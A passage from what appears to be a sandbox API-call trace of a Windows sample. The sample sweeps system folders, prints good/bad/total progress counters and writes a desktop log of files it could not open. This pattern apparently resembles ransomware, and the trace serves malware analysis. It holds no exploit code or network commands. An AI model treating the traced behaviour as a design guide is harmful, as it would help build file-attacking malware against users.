process\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.PERFTRACKPOINTDATA.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\parse.dat\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedSettings\\utc.app.json\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Microsoft\\Diagnosis\\DownloadedScenarios\\WINDOWS.SIUF.xml.new\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\". The system cannot find the file specified\r\nOPER_BTO: Cannot open file \"C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\". The system cannot find the file specified\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\Journal", lpUsedDefaultChar=0x0) returned 16467 [0285.035] WriteFile (in: hFile=0x284, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x4053, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x63fe20*=0x4053, lpOverlapped=0x0) returned 1 [0285.036] CloseHandle (hObject=0x284) returned 1 [0285.036] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=871 / B=45 / T=2891", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0285.036] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=871 / B=45 / T=2891", cchWideChar=39, lpMultiByteStr=0x1fe5354, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=871 / B=45 / T=2891", lpUsedDefaultChar=0x0) returned 39 [0285.036] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x27, lpOverlapped=0x0) returned 1 [0285.044] Sleep (dwMilliseconds=0x5dc) [0286.559] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=1002 / B=45 / T=2891", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0286.559] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=1002 / B=45 / T=2891", cchWideChar=40, lpMultiByteStr=0x1ff389c, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=1002 / B=45 / T=2891", lpUsedDefaultChar=0x0) returned 40 [0286.559] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x28, lpOverlapped=0x0) returned 1 [0286.567] Sleep (dwMilliseconds=0x5dc) [0288.082] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=1069 / B=45 / T=2891", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0288.082] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=1069 / B=45 / T=2891", cchWideChar=40, lpMultiByteStr=0x1ff3c1c, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=1069 / B=45 / T=2891", lpUsedDefaultChar=0x0) returned 40 [0288.082] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x28, lpOverlapped=0x0) returned 1 [0288.097] Sleep (dwMilliseconds=0x5dc) [0289.605] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bad_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\bad_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0289.634] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\r\nFNF: C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\restaurant.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\r\nFNF: C:\\ProgramData\\Oracle\\Java\\installcache_x64\\baseimagefam8\r\nFNF: C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp\r\nFNF: C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\r\n", cchWideChar=4328, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4328 [0289.634] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\r\nFNF: C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\restaurant.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\r\nFNF: C:\\ProgramData\\Oracle\\Java\\installcache_x64\\baseimagefam8\r\nFNF: C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp\r\nFNF: C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\r\n", cchWideChar=4328, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4328 [0289.634] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\r\nFNF: C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\restaurant.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\r\nFNF: C:\\ProgramData\\Oracle\\Java\\installcache_x64\\baseimagefam8\r\nFNF: C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.017.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\17dfc292991c7c24.timestamp\r\nFNF: C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.014.etl\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\r\n", cchWideChar=4328, lpMultiByteStr=0x1ef0aa8, cbMultiByte=4328, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\nATO_OPER: C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\r\nATO_OPER: C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Journal.exe\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{74d0e5db-b326-4dae-a6b2-445b9de1836e}\\state.rsm\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\java.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nATO_OPER: C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\r\nATO_OPER: C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\r\nFNF: C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi\r\nFNF: C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl\r\nFNF: C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.013.etl\r\nATO_OPER: C:\\Program Files\\Windows Portable Devices\\restaurant.exe\r\nATO_OPER: C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\r\nFNF: C:\\ProgramData\\Oracle\\Java\\installcache_x64\\baseimagefam8\r\nFNF: C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi\r\nFNF: C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl\r\nFNF: C:\\ProgramData\\USOShared\\Logs\\UpdateSessionOrchestration.015.etl\r\nFNF: C:\\Users\\All Users\\Oracle\\Java\\javapath\\javaw.exe\r\nFNF: C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi\r\nFNF: C:\\Users\\All Users\\Package 